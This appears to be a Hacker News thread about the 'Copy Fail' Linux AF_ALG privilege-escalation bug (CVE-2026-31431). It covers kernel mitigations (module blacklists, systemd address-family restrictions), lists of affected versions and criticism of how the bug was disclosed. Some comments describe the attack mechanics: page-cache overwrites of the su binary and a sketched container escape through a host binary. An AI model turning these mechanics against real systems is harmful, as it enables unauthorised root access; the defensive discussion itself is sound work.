As someone who works on the Linux kernel's cryptography code, the regularly occurring AF_ALG exploits are really frustrating. AF_ALG, which was added to the kernel many years ago without sufficient review, should not exist. It's very complex, and it exposes a massive attack surface to unprivileged userspace programs. And it's almost completely unnecessary, as userspace already has its own cryptography code to use. The kernel's cryptography code is just for in-kernel users (for example, dm-crypt).<p>The algorithm being used in this exploit, "authencesn", is even an IPsec implementation detail, which never should have been exposed to userspace as a general-purpose en/decryption API.<p>If you're in charge of the configuration for a Linux kernel, I strongly recommend disabling all CONFIG_CRYPTO_USER_API_* kconfig options. This would have made this bug, and also every past and future AF_ALG bug, unexploitable. In the unlikely event that you find that it breaks any userspace programs on your system, please help migrate them to userspace crypto code! For some it's already been done. But in general, AF_ALG has actually never been used much in the first place, other than in exploits.<p>I don't think there's much other option. This sort of userspace API might have been <i>sort of</i> okay many years ago. But it just doesn't stand up in a world with syzbot, LLM-assisted bug discovery, etc.
As I did not know what AF_ALG is in the first place I've searched for it and found this here:<p><a href="https://www.chronox.de/libkcapi/html/ch01s02.html" rel="nofollow">https://www.chronox.de/libkcapi/html/ch01s02.html</a><p>It states the following:<p>> There are several reasons for AF_ALG:<p>> * The first and most important item is the access to hardware accelerators and hardware devices whose technical interface can only be accessed from the kernel mode / supervisor state of the processor. Such support cannot be used from user space except through AF_ALG.<p>> * When using user space libraries, all key material and other cryptographic sensitive parameters remains in the calling application's memory even when the application supplied the information to the library. When using AF_ALG, the key material and other sensitive parameters are handed to the kernel. The calling application now can reliably erase that information from its memory and just use the cipher handle to perform the cryptographic operations. If the application is cracked an attacker cannot obtain the key material.<p>> * On memory constrained systems like embedded systems, the additional memory footprint of a user space cryptographic library may be too much. As the kernel requires the kernel crypto API to be present, reusing existing code should reduce the memory footprint.<p>I can't judge whether this is a good justification, but there is one.
AF_ALG, if I remember correctly, predates userspace-accessible crypto acceleration, and was way more important back when you had an actual need for "SSL accelerator" cards in servers, among other things.
Hi, embedded firmware engineer here. I give it a B-<p>There's a weird area between the workloads that fit on a microcontroller, and the stuff that demands a full-blown CPU. Think softcore processors on FPGAs, super tiny MIPS and RISC-V cores on an ASIC, etc. Typically you run something like Yocto on a core like that. Maybe MontaVista or QNX if you've got the right nerd running the show.<p>So you have serious compute needs, and security concerns that justify virtual memory. But you <i>don't</i> have infinite space to work with, so hardware acceleration is important. Having a standard API built into the kernel seems like a decent idea I guess.<p>And yet, I've never heard of AF_ALG. I've never seen it used. The thing is, if you have some bizarro softcore, there's a good chance you also have a bizarro crypto engine with no upstream kernel driver. If you're going to the trouble of rolling your own kernel with drivers for special crypto engines, why would you bother hooking it into this thing? Roll your own API that fits your needs and doesn't have a gigantic attack surface.
You should take note that this is written by the person that wrote the bad patch.<p>So grain of salt.
I've said I'm not sure about the validity of that reasoning.<p>I've linked it nevertheless for context, as an augmentation to the parent's post.
I feel like it should be possible to fulfill these advantages with a minimal, not very complex API. I.e. the grandparent's comment about IPsec implementation details doesn't make the cut, but a hardware accelerated cipher implementation does.
But is it true or not, whoever wrote it? (For objective truth, the author is unimportant.)
It might have been true in 2002 but it hasn't been true since at least about 2010.<p>You've almost certainly never had a system that supported any hardware-accelerated crypto that also required a kernel module.<p>It's much easier to expose as CPU extensions.
When you can’t know the objective truth or when there isn’t one (as is the case in making decisions about security tradeoffs in software design), knowing the source of the argument is vital to interpreting its validity.
Please don't rely on my judgement for this being safe for production, but
after blacklisting the modules, the provided python exploit failed.<p>Check if the following are modules<p><pre><code> grep CONFIG_CRYPTO_USER_API /boot/config-$(uname -r)
</code></pre>
If they are, you can try blacklisting them<p><pre><code> cat > /etc/modprobe.d/blacklist-crypto-user-api.conf <<'EOF'
blacklist af_alg
blacklist algif_hash
blacklist algif_skcipher
blacklist algif_rng
blacklist algif_aead
install af_alg /bin/false
install algif_hash /bin/false
install algif_skcipher /bin/false
install algif_rng /bin/false
install algif_aead /bin/false
EOF
update-initramfs -u
</code></pre>
Can anyone comment on the ramifications of this?
If iwd, or cryptsetup with certain non-default algorithms, isn't being used on the system, you should be fine. Not many programs use AF_ALG. It's possible there are others I'm not aware of, but it's quite rare.<p>To be clear, general-purpose Linux distros generally can't disable these kconfig options yet, due to these cases. But there are many Linux systems that simply don't need this functionality.<p>A good project for someone to work on would be to fix iwd and cryptsetup to always use userspace crypto, as they should.
Or<p><pre><code> zgrep CONFIG_CRYPTO_USER_API /proc/config.gz</code></pre>
I can’t comment on the ramifications, except to note that elsewhere in the thread this appears to not break anything (whether it makes userspace crypto a little less safe is academic, but that doesn’t matter if we have an easy local root shell), but I can verify the above fix does protect Ubuntu 24.04 from the exploit.<p>Just reboot after applying this change.
Is it built as a module in most distros?
For anyone wondering: AF_ALG is a Linux socket interface that exposes the kernel’s crypto API via file descriptors, using normal read(2)/write(2) calls for hashing and encryption.
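To make that concrete, here's a minimal sketch of the hashing path using only Python's standard library. It's Linux-only, and it will fail if the algif_hash module has been blacklisted as suggested elsewhere in the thread:<p><pre><code>import hashlib
import socket

msg = b"hello AF_ALG"

# Bind a configuration socket to the kernel's sha256 implementation...
with socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0) as alg:
    alg.bind(("hash", "sha256"))
    # ...then accept() yields a per-operation socket to stream data through.
    op, _ = alg.accept()
    with op:
        op.sendall(msg)
        digest = op.recv(32)  # sha256 digests are 32 bytes

# Sanity check against the userspace implementation.
assert digest == hashlib.sha256(msg).digest()
print(digest.hex())
</code></pre>The `assert` at the end makes the point from upthread: userspace already has a perfectly good implementation of the same primitive.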
I love this. I think everyone in software should be feeling a tinge of “we should trim the fat” right now - get rid of as much of the old and infrequently used/tested code as we can. Push users towards the better tested alternatives.
It does enable address space separation of secret keys from user space, which some people love:<p><a href="https://blog.cloudflare.com/the-linux-kernel-key-retention-service-and-why-you-should-use-it-in-your-next-application/" rel="nofollow">https://blog.cloudflare.com/the-linux-kernel-key-retention-s...</a><p><a href="https://www.youtube.com/watch?v=7djRRjxaCKk" rel="nofollow">https://www.youtube.com/watch?v=7djRRjxaCKk</a><p><a href="https://www.youtube.com/watch?v=lvZaDE578yc" rel="nofollow">https://www.youtube.com/watch?v=lvZaDE578yc</a><p>So it's not as simple as "should not exist". I agree though that there doesn't seem to be a valid need to expose authencesn to user space.<p>Disclosure: I'm co-maintaining crypto/asymmetric_keys/ in the kernel and the author/presenter in the first two links is another co-maintainer.
That can be done in userspace too -- different userspace processes have different address spaces too.<p>The fact that the first link recommends using keyctl() for RSA private keys is also "interesting", given that the kernel's implementation of RSA isn't hardened against timing attacks (but userspace implementations of RSA typically are).
The CloudFlare blog discusses that idea when they talk about having an "agent process" to hold cryptographic material, but they list drawbacks like having to develop two processes, implement a well-defined interface, and enforce ACLs. I'm not convinced that "developing two processes" is a reason not to do it, since the kernel is effectively just the second process now, but everything else makes sense.<p>It's unfortunate though since this is one thing I think Windows does decently well. The Windows crypto and TLS APIs do use a key isolation process by default (LSASS) and have a stable interface for other processes to use it [0]. I imagine systemd could implement something similar, but I also know that there are very strong opinions about adding more surface area to systemd.<p>[0] <a href="https://blackhat.com/docs/us-16/materials/us-16-Kambic-Cunning-With-CNG-Soliciting-Secrets-From-SChannel.pdf" rel="nofollow">https://blackhat.com/docs/us-16/materials/us-16-Kambic-Cunni...</a>
> the kernel's implementation of RSA isn't hardened against timing attacks<p>Cloudflare is using custom BoringSSL-based crypto code in the kernel:<p><a href="https://lore.kernel.org/all/CALrw=nEyTeP=6QcdEvaeMLZEq_pYB9WO=vFt2K2FuJ1TEmP1Lg@mail.gmail.com/" rel="nofollow">https://lore.kernel.org/all/CALrw=nEyTeP=6QcdEvaeMLZEq_pYB9W...</a>
Can you please give me a real-life example of a userspace application, on a typical Linux laptop or typical Linux server, that would use this CRYPTO_USER_API? None that I looked at seem to use it: openssl, pgp, sha256sum
As Eric has correctly stated above, we believe iwd (iNet wireless daemon), or rather the ell library it relies on (Embedded Linux Library), is the only relatively widespread userspace application relying on it.
Isn't the better argument to ask whether there'd be benefit if all those things did?<p>A lack of adoption isn't a priori a good argument against an interface, and serious bugs can happen anywhere.<p>My personal opinion for a while has been that crypto operations <i>should</i> be in the kernel so we can end the madness that is every application shipping its own crypto and trust system, which has only gotten worse since containers were invented.
> My personal opinion for a while has been that crypto operations should be in the kernel so we can end the madness that is every application shipping it's own crypto and trust system which has only gotten worse since containers were invented.<p>There’s a valid argument here but I think that’d devolve into the DNSSec trap without both a very well-designed API and a stable way to ship updates for older kernels. If people can’t get good user experience or have to force kernel upgrades to improve security, most applications will avoid it. Things like Chrome shipping their own crypto mean that they can very quickly ship things like PQC without waiting years or having to deal with issues like kernel n+1 having unrelated driver or performance issues which force things into a security vs. functionality fight.
Which does sort of loop around to the issue of Linux not having a stable ABI (as a feature, I suppose), which would be one way to implement it with long-term compatibility for kernel modules.<p>But the Chrome example also highlights the problem: Chrome might ship it, but vanishingly little software is ever going to upgrade, and we've got an explosion of statically linked languages now.
> A lack of adoption isn't apriori a good argument against an interface<p>I mean it kind of is (perhaps not a priori, but why is that relevant?). If something is not being used, it's not meeting needs, so it's just increasing attack surface without benefit.
I was completely unaware of <a href="https://syzbot.org" rel="nofollow">https://syzbot.org</a>, thanks for sharing!<p>> syzbot system continuously fuzzes main Linux kernel branches and automatically reports found bugs to kernel mailing lists. syzbot dashboard shows current statuses of bugs. All syzbot-reported bugs are also CCed to syzkaller-bugs mailing list. Direct all questions to syzkaller@googlegroups.com.
The primary benefit of AF_ALG is IMHO when it's combined with kernel keyrings, i.e. ALG_SET_KEY_BY_KEY_SERIAL.<p>To steal from the sibling post:<p>> * When using user space libraries, all key material and other cryptographic sensitive parameters remains in the calling application's memory even when the application supplied the information to the library. When using AF_ALG, the key material and other sensitive parameters are handed to the kernel. The calling application now can reliably erase that information [...]<p>It's even more than this: you can do crypto ops in user space <i>without ever even having the key to begin with</i>.<p>[Ed.: that said, maybe AF_ALG should be locked behind some CAP_*]<p>[Ed.#2: that said^2, I'm putting this one on authencesn, not AF_ALG. It's the extended sequence number juggling that went poorly, not AF_ALG at large. I bet this might even blow up in some strange hardware scenarios, "network packet on PCIe memory" or something like that - I'm speculating, though.]
It doesn't seem to actually get used that way in practice. ALG_SET_KEY_BY_KEY_SERIAL didn't even appear until just a few years ago. And either way, if the interface allows you to overwrite the su binary, whether it theoretically could provide some other security benefit becomes kind of irrelevant.
It is being used that way:<p><a href="https://github.com/opensourcerouting/frr/blob/2b48e4f97fb02133f3a09db067dc8249ed41e968/lib/keyctl.c#L593" rel="nofollow">https://github.com/opensourcerouting/frr/blob/2b48e4f97fb021...</a><p>And, sure, if it breaks system security it's pointless. But so did "dirty pipe".<p>I do agree the number of issues in AF_ALG is annoying, which is why I suggested a CAP_* restriction. Maybe CAP_SYS_ADMIN in init_ns, that's kinda the big hammer.
Better implemented as another user space process than in the kernel.
I think it would be reasonable to deprecate af_alg in favor of a character device. It's more accessible that way. The downside is that the maintainers hate adding new ioctls. I think that's fair. But I don't think a "regular" device node would cover the functionality userland expects.<p>That said, elsewhere ITT it's pointed out there are only a few use cases so far.
Why is this available in the kernel on a box that does not use IPsec? Shouldn't this be a compile-time-enabled module instead of a generic solution?
The design philosophy of mainstream Linux distros is not like OpenBSD.<p>Linux distros go to market as maximally capable, maximally interoperable, and maximally available for whatever the users want to do. So there is a lot of "shovelware" that is unnecessarily installed with your base system. A lot of services are enabled that you don't need. A lot of kernel modules are loaded or ready to spring into action as soon as you connect hardware that the kernel recognizes.<p>All this maximizing also increases the system's attack surface, whether local or over the network. The resources, time, and effort needed to update the system and maintain all those packages increase. The TCO is high.<p>With OpenBSD, the base system is hardened and the code is audited with security in mind. They only install or enable essential functions. So it's up to the user to dig in, customize it, and add in features that are needed.<p>The good news is that you can do some after-market hardening. Uninstall software that you're not using, and disable non-essential services. Tune your kernel for special-purpose, or general-purpose, but not every-purpose.<p>There are now special distros for containers and VMs with minimal system builds. They are designed to be as small and lightweight as possible. That is a good start in the right direction.
How did it get in? Isn’t Linus known for being rightfully fussy about what makes it into the kernel?<p>Would be an interesting story.
Removing this will make the friendly spooks at NSA very sad....
No, it'd make <i>me</i> sad. If they're lurking in there and we can do without, I'm happy to always have my own .config<p>If this gets removed, they'll creep in somewhere we can't find them for a while.
iwd requires CONFIG_CRYPTO_USER_API_AEAD, so disabling this would break Wi-Fi for a lot of people.
Many things, such as ksmbd, seem ill-advised when looked at from a security standpoint. The new era of AI-driven exploit discovery will likely make projects more wary of adding features.
YAGNI stocks are rising, Gentoo devs that compile their own kernel probably yeeted this module. Alpine, and MUSL deviants are probably immune to this downswing.<p>DRY looking very bearish, do repeat yourself, do build your own, do use userspace tools even if the kernel has its own version. Not as big a hit on the DRY philosophy as those pip and npm supply chain attacks last couple of weeks though.<p>KISS remains unaffected for the time being.
any idea what software this will break once I turn this kernel configuration off?
iwd is the main culprit (for systems that use it instead of wpa_supplicant).<p>I think cryptsetup / LUKS also requires it with some non-default options. With the default options, it works fine with the kconfigs disabled.<p>There's not much else, as far as I know. Normally programs just use a userspace library instead, such as OpenSSL.
What other kernel modules would you suggest disabling that aren't used usually?
It seems there was some kind of confusion during the disclosure process, because the vendors aren't treating this vulnerability as serious and it remains unpatched in many distros.<p><a href="https://access.redhat.com/security/cve/cve-2026-31431" rel="nofollow">https://access.redhat.com/security/cve/cve-2026-31431</a> "Moderate severity", "Fix deferred"<p><a href="https://security-tracker.debian.org/tracker/CVE-2026-31431" rel="nofollow">https://security-tracker.debian.org/tracker/CVE-2026-31431</a><p><a href="https://ubuntu.com/security/CVE-2026-31431" rel="nofollow">https://ubuntu.com/security/CVE-2026-31431</a><p><a href="https://www.suse.com/security/cve/CVE-2026-31431.html" rel="nofollow">https://www.suse.com/security/cve/CVE-2026-31431.html</a>
Seems like distros consider it a medium risk because it doesn't involve remote code execution and requires local access. Though it allows local root privilege escalation which is considered high priority.<p><a href="https://ubuntu.com/security/cves/about#priority" rel="nofollow">https://ubuntu.com/security/cves/about#priority</a><p>> Medium: A significant problem, typically exploitable for many users. Includes network daemon denial of service, cross-site scripting, and gaining user privileges.
Strange that it's not classified as "high", which specifically includes "local root privilege escalations".<p>> High: A significant problem, typically exploitable for nearly all users in a default installation of Ubuntu. Includes serious remote denial of service, local root privilege escalations, local data theft, and data loss.
if your model is that linux is just about single-user desktops, this local exploit isn't too bad. or if your model is nothing but DB servers or the like.<p>mystifying to me that shared, multi-user machines are not thought of. for instance, I administer a system with 27k users - people who can login. even if only 1/10,000 of them are curious/malicious/compromised, we (Canadian national research HPC systems) are at risk. yes, this is somewhat uncommon these days, when shell access is not the norm.<p>but consider the very common sort of shared hosting environment: they typically provide something like plesk to interface to shared machines with no particular isolation. can you (as a website owner or 0wner) convince wordpress/etc to drop and execute a script? yep.
Ubuntu is not really targeting multi-user any more. Security update installation is deliberately delayed for all users, until at some point every unprivileged user has ended all processes launched from the vulnerable snap image. (Firefox RPC breaks when you replace the binary, so having to reopen your browser to keep opening tabs simply because security upgrades were applied in the background would be inconvenient.)
> if your model is that linux is just about single-user desktops, this local exploit isn't too bad.<p>For example, if you have passwordless sudo, you've already got a widely known LPE vulnerability lurking on your system.
Only for your user, and it means a keylogger on the system if it gets rooted can't pull your password to try on other machines. Personally I always either login as root or use passwordless sudo.
Yubikeys are also surprisingly annoying when set up for this. A working developer just needs sudo a lot.<p>Realistically a "sudo button" would be handy on the keyboard, with a display to show a confirmation PIN for the request (probably also needs a deny button so you can try and identify weird ones).
Sounds like a good use case for that new Copilot button you see on newer keyboards.
You don't even need a button. Just a secure dialog like Windows has.
I mean, that's what you have pinentry for.
hmm have i missed anything?
Not too bad? So we just treat Linux overall as a single-user system, or what?
Local access is a bit of a misnomer, though: a vulnerable website can be tricked into running a script.
Ubuntu seems to have updated the page to say that it's a high priority now.
It's not like this couldn't be chained with some other exploit that provides remote access, turning it into remote root, which seems like a bit of an issue.
As far as we can tell, nobody disclosed it to the distributions, only to the kernel security team (who did not reach out to distributions). So the distributions are all scrambling now.<p>Good lesson in how not to do disclosure.
It was already known to attackers (or basically anyone watching) weeks ago when the patch hit the kernel but it wasn't communicated by upstream as a vuln (because Linus and Greg do not believe that vulnerabilities are conceptually relevant to the kernel).
Yeah, it was also staged for release on the affected kernel branches a while ago, but almost all still had the window open and only tonight got the fixes merged across all maintained kernel versions.<p>It's not good... and surely not "responsible/planned" disclosure.
RedHat has also changed it to "Important severity" and "Affected" now.
I'm shocked that Ubuntu is aware of this and the previous LTS is not patched yet :|<p>wtf
I thought that. Surely people are going crazy right now owning anything with an out-of-date WordPress exposed.
Yeah, by ubuntu's own guidelines linked on that page, this should be priority: high, but instead it's marked as medium.
The upstream stable kernels (6.12.85, etc.) are out now with the fixes.
It's unfortunate that this does not include which versions of the kernel are vulnerable/patched, especially since this is a builtin module which cannot be easily removed with rmmod...<p>I was wondering if I was vulnerable running Fedora 44, kernel 6.19.14, and after a few minutes of digging I was able to find the linux-cve-announce mailing list post: <a href="https://lore.kernel.org/linux-cve-announce/2026042214-CVE-2026-31431-3d65@gregkh/T/#u" rel="nofollow">https://lore.kernel.org/linux-cve-announce/2026042214-CVE-20...</a> which says:<p><pre><code> ...fixed in 6.18.22 with commit fafe0fa2995a0f7073c1c358d7d3145bcc9aedd8
...fixed in 6.19.12 with commit ce42ee423e58dffa5ec03524054c9d8bfd4f6237
...fixed in 7.0 with commit a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5
</code></pre>
Hope that helps.
Thanks for this - I was wondering why I got the password prompt on my Fedora 43 with latest packages.
Most distros backport fixes, which does not increment that version number; i.e., they patch it rather than shipping a completely new kernel release.
Greg KH says more backports coming soon.<p><a href="https://openwall.com/lists/oss-security/2026/04/30/12" rel="nofollow">https://openwall.com/lists/oss-security/2026/04/30/12</a>
This submission is currently the main HN submission.<p>As of now the submission title is simply “Copy Fail”.<p>Given the severity of the exploit, can we edit the Title to add some context that it’s a major Linux vulnerability?<p>Eg the other submissions say this :
“Copy Fail: 732 Bytes to Root on Every Major Linux Distribution.”
I don't really get why you'd<p>- buy a domain<p>- vibe code a page/artifact/whatever (which, given the quality of LLM wordings, only makes an argument less strong)<p>- post it on HN with no further explanation in the title<p>Why not write a detailed report? Even a tweet makes much more sense in my head than this. Even a logo??<p>Sorry if this comes over as salty, I guess I'm just not getting the thought process.
> I dont really get why you'd buy a domain [...] Even a tweet makes much more sense in my head than this<p>I think we should be celebrating people hosting their own content on their own website instead of just posting on some social media site.
I think they’re using it to promote their product, Xint Code, which was used to discover it. That’s the way I read it anyway.
Maybe it’s tradition <a href="https://news.ycombinator.com/item?id=7548991">https://news.ycombinator.com/item?id=7548991</a>
Where would you have them write a detailed report if not a website?
The domain is canonical.<p>Then it's syndicated everywhere.<p>But all roads lead back to the domain.
Definitely comes over as salty. Naming major flaws has been a tradition for decades. Remember Heartbleed? It had a site and a logo :) Shellshock, Meltdown, Spectre as well. A few more: <a href="https://github.com/hannob/vulns" rel="nofollow">https://github.com/hannob/vulns</a><p>This site though is pretty useful; first it serves as a central location to point people to with short links in chats/emails/whatever, then it has a quick visual explainer <i>and</i> a link to the detailed technical report for those who want more info. Pretty neat.<p>Last but not least, buying the domain must have taken 5 minutes, prompting the page must have taken 30 minutes and posting it on HN must have taken 1 minute. So it certainly wasn't a lot of work in the grand scheme of things and probably did not deter the team from doing other important things.
It used to be done for fame and visibility. Give it a marketable name and a website, and your exploit will be talked about and your name will shine in the industry.<p>Now it's done by an LLM to sell more LLM services. Disclosure is botched to get the most sensational title: more clicks, more upsell.
[dead]
Yes, strongly agree.<p>This is HUGE news, I would have skimmed over "Copy Fail".<p>The blog post might be a better place to link to also, it has more details on the exploit.<p><a href="https://xint.io/blog/copy-fail-linux-distributions" rel="nofollow">https://xint.io/blog/copy-fail-linux-distributions</a><p>There are also some good threads on which distros are vulnerable and mitigations on the github page.<p><a href="https://github.com/theori-io/copy-fail-CVE-2026-31431/issues" rel="nofollow">https://github.com/theori-io/copy-fail-CVE-2026-31431/issues</a>
If you want to use the suggested mitigation (disabling kernel module `algif_aead` with a modprobe config), and you do not want to run that whole obfuscated shell code to get an actual root shell, but only check if the module can be loaded, here is a readable version of its first few lines:<p><pre><code> python3 -c 'import socket; s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0); s.bind(("aead","authencesn(hmac(sha256),cbc(aes))")); print("algif_aead probably successfully loaded, mitigation not effective; remove again with: rmmod algif_aead")'
</code></pre>
Similarly, when the mitigation is in place,<p><pre><code> modprobe algif_aead
</code></pre>
should fail with an error.
LPE = local privilege escalation<p>Too many darn acronyms. This one wasn't too hard to figure out from context but I wish people would define acronyms before using them!
LPE is a very well-known acronym within the security community, it's not purely academic or obscure or anything.<p>I agree that it would be a good idea to define it explicitly when writing for a broader audience, but I don't think it's particularly egregious that they didn't. It's certainly something I could see myself forgetting.<p>Then again, the whole writeup appears to be AI-generated, so...
It is nowhere near this. There are very few acronyms in the IT world that are actually well-known outside of it. LPE is less well-known than LVAD or MCU.<p><a href="https://www.acronymfinder.com/Information-Technology/MCU.html" rel="nofollow">https://www.acronymfinder.com/Information-Technology/MCU.htm...</a><p><a href="https://www.acronymfinder.com/LVAD.html" rel="nofollow">https://www.acronymfinder.com/LVAD.html</a><p><a href="https://www.acronymfinder.com/Information-Technology/LPE.html" rel="nofollow">https://www.acronymfinder.com/Information-Technology/LPE.htm...</a>
Sure, but the target audience of copy.fail is surely not the security community but regular sysadmins who probably don't otherwise follow as closely.
Good writing for a broad audience requires it. Unfortunately the LLMs don't tend to adopt this guideline.
To be fair, I just consulted 3 cybersecurity glossaries (SANS.org, NIST CSRC, Huntress), and none of them list "LPE" nor "Local Privilege Escalation".<p>If you type "LPE" into English Wikipedia's search bar, and press "Enter", you'll be sent to a disambiguation page which contains a link to the relevant article.<p><a href="https://en.wikipedia.org/wiki/LPE" rel="nofollow">https://en.wikipedia.org/wiki/LPE</a>
I don't know why, but newer writers have never been taught to expand their acronyms on first use. I blame the US education system.
Good thing nobody is silly enough to let fully autonomous AI agents run as regular users on these affected operating systems. That could be disastrous given a zero day prompt injection technique.
I don't see what the issue is, my agent is already running as root.
Good thing we haven't normalized installing things with curl | sh
Yeah, that's great!<p>Imagine we would download random code from the internet and just execute it, like with NPM, PIP, Maven, Cargo etc.
I don’t think that matters as it’s usually curl | sudo sh
Or npm being allowed to run arbitrary post install scripts
I literally ship an installer that runs with curl | bash... reading this thread while patching my servers is a fun experience lol
[dead]
That is why we should get rid of setuid binaries. GrapheneOS does not use them and was therefore not affected. On the desktop there is also a project called Secureblue based on Fedora Atomic that is moving in a similar direction and has already eliminated a large number though not all setuid binaries. As an alternative to sudo, su, and pkexec there is for example run0, which is available in distributions using systemd. Since systemd 259 there is now also the --empower parameter which like sudo elevates the privileges of the regular user. Essentially any distribution could start removing sudo and create an alias so that users don’t have to adjust immediately.
No, it is not affected by the exploit as presented. This is a page cache write, so writing to a binary that root will run later can work too. This isn’t a reason to push an agenda that dislikes setuid binaries.
The page itself seems vibecoded and a bit of an advertisement, but it does look like the vulnerability is real and high risk. It does explain the big security update I just got, guess I'll prioritize updating today.
This is pretty obviously an advertisement but it's a pretty good advertisement imo, it pairs a meaningful contribution to the OSS ecosystem (discovering and patching a real bug) with selling your cybersecurity tool at the same time.
With vibe coding, HTML is a visualisation tool. Not sure I get your problem with that?
These guys don't need to advertise, they are already 100% busy with work. But who wastes their time manually creating web pages? Especially kernel devs.
Side comment: I have recently used Claude Code to make a few sites for testing purposes. In the prompt I added "don't make it look vibe coded," and it worked pretty well: No purple gradients, bento box layouts, etc. Nothing spectacularly original, either, but probably enough to avoid accusations of vibe coding.
it's advertising their AI, not the talents of their humans :D
I wasn't able to unload algif_aead on RHEL 9/10 because it's built in, rather than a module.<p>So here's the next-best thing I found: disable AF_ALG via systemd. Needs drop-ins for all exposed services. Here's an Ansible playbook that covers sshd and user@, which are usually the main ones.<p><a href="https://gist.github.com/m3nu/c19269ef4fd6fa53b03eb388f77464da" rel="nofollow">https://gist.github.com/m3nu/c19269ef4fd6fa53b03eb388f77464d...</a>
How about blacklisting algif_aead initialization function on RHEL 9/10? I added "initcall_blacklist=algif_aead_init" to the kernel boot options and rebooted. The exploit is not working anymore.
FYI RHEL's SELinux policy blocks AF_ALG socket creation for confined services out of the box. But disabling via RestrictAddressFamilies= unit option, or initcall_blacklist= kernel parameter, seems to be a good mitigation for unconfined services, users and containers.
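For reference, a drop-in along those lines might look like this (a sketch only; the path and family list are illustrative — RestrictAddressFamilies= is an allowlist, so the point is to enumerate the families the service actually needs and leave AF_ALG out):<p><pre><code># /etc/systemd/system/sshd.service.d/10-no-af-alg.conf  (illustrative path)
[Service]
# Allowlist of address families; AF_ALG is deliberately absent.
# Adjust the list per service before deploying.
RestrictAddressFamilies=AF_UNIX AF_INET AF_INET6 AF_NETLINK
</code></pre><p>After adding a drop-in, run `systemctl daemon-reload` and restart the service; any socket(AF_ALG, ...) call from it will then fail with EAFNOSUPPORT.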
I came to the same intuition. However, it's whack-a-mole. What about cron jobs, Slurm jobs, and other services? Is there a way to do this directly in systemd so that all other processes inherit it, rather than doing it for each one?
So this replaces a SUID binary, in order to run as UID 0. The website claims it can escape "Kubernetes / container clusters" and "CI runners & build farms" but I don't see anything supporting the claim it can escape a container (or specifically, a user namespace).<p>I ran the exploit in rootless Podman, and predictably it doesn't escape the container.<p>They also claim their script "roots every Linux distribution shipped since 2017", but they only tested four; and it doesn't work on Alpine.
><i>The website claims it can escape "Kubernetes / container clusters" and "CI runners & build farms" but I don't see anything supporting the claim it can escape a container </i><p>they state that the write-up is forthcoming. presumably there is some additional steps or modifications that will be detailed in the 'part 2'.<p><i>"Next: "From Pod to Host," how Copy Fail escapes every major cloud Kubernetes platform."</i>
It overwrites bytes in memory of any file you can read. It's not hard to imagine how it could escape a lot of things.
The 2017 claim is based on the vulnerability having been introduced in this commit in the second half of 2017: <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=72548b093ee3" rel="nofollow">https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/lin...</a><p>The details will depend on whether the kernel is a newer release or a maintenance version of an older release.
> They also claim their script "roots every Linux distribution shipped since 2017.", but only tested four; and it doesn't work on Alpine<p>They've done themselves no favours at all with their write up.<p>It does seem legitimate (I was able to use the PoC on a 24.04 instance), and seems like it should be a big deal, but the actual number of affected distributions seems way lower, and not even remotely as per their claim every distribution since 2017.<p>For example with Ubuntu, if I'm reading it right there's some impact in 16.04 (EOL), but then at least as per their analysis, only the vendor specific 6.17 kernels they ship that have it (e.g. linux-gcp, linux-oracle-6.7 etc.). That's a relatively new kernel version they started shipping recently, after it was released upstream last September.
If you can get to real UID 0 from a rootless container, you can escape it, but you do need to take extra steps. Same with Alpine: the underlying vulnerability probably still exists, but the script might need some adjusting. It's a PoC, not a full exploit for every situation.
It's worth pointing out that you cannot, definitionally, get "real UID 0" in a "rootless" container, because then it wouldn't be a rootless container. This is relevant because this exploit doesn't claim to be able to bypass user namespaces, and that getting "real UID 0" would be a different exploit.
The underlying exploit allows writing arbitrary values to the page cache, independent of any namespacing, so it should be assumed to allow container escapes even if the given PoC code doesn't do that.
That's fair (although it doesn't have anything to do with getting "real root" in a userns in that case). I guess one approach would be something like modifying the host's logrotate binary and waiting for it to trigger, or something like that. Would escape the container to root on the host directly. I imagine it wouldn't be a sure thing to pull off, either, but definitely straightforward enough that any APT should be asking Claude to develop it.
Their PoC does as you say, but is built upon arbitrary modification of the page cache, which could be abused for the other things
Kubernetes 1.33 switches to user namespaces enabled by default, which I imagine is the same underlying mechanism that rootless Podman uses. `hostUsers: false` is the way to ensure that root in the pod is not root on the host. It's trivial for a real (unmapped) root to escape a Kubernetes pod.
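For anyone wanting to opt in explicitly rather than rely on defaults, the pod-spec field looks roughly like this (a sketch; `hostUsers` is the real field name from the Kubernetes user-namespaces feature, while the pod name and image are illustrative):<p><pre><code>apiVersion: v1
kind: Pod
metadata:
  name: userns-demo          # illustrative
spec:
  hostUsers: false           # UID 0 inside the pod maps to an unprivileged host UID
  containers:
    - name: app
      image: busybox         # illustrative
      command: ["sleep", "infinity"]
</code></pre><p>With `hostUsers: false`, even a successful in-pod privilege escalation lands you in a namespaced UID 0, not host root — blast-radius reduction, not a substitute for patching the node kernel.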
Did you try it on systems that don't have the patch already? Seems many distributions already shipped kernels with the patch ~a month ago.
It also doesn't work on Raspberry Pi, though presumably it could easily be made to; it does replace the su binary, but the replacement is not executable.
It's patching the binary in memory, so the binary patch would be architecture dependent. The existing one is only x86_64, but with an updated payload, it would work on arm.
this is because the `su` binary is replaced with x86 shellcode, replace it with aarch64 and it will work just the same.
there is a PoC floating around for Alpine.
[flagged]
For mitigation, the page currently basically just says:<p>> Update your distribution's kernel package to one that includes mainline commit a664bf3d603d<p>But it isn't very clear to me what Kernel version you can expect that to be in. For Arch/CachyOS, the patch seems to be included in 6.18.22+, 6.19.12+ and 7.0+. If you're on any of the lower versions in the same upstream stable series, you're likely vulnerable right now. Some distro kernels may include the fix in other versions, so check for your distribution.
On a git repo that has as remotes<p><pre><code> https://github.com/torvalds/linux.git
 https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git
</code></pre>
running a search for commit a664bf3d603d's commit message:<p><pre><code> git log --all --grep 'crypto: algif_aead - Revert to operating out-of-place' '--format=%H' | xargs -I '{}' git tag --contains '{}' | sort -u
</code></pre>
outputs these tags as having the fix:<p><pre><code> v6.18.22
v6.18.23
v6.18.24
v6.18.25
v6.19.12
v6.19.13
v6.19.14
v7.0
v7.0.1
v7.0.2
v7.0-rc7
v7.1-rc1</code></pre>
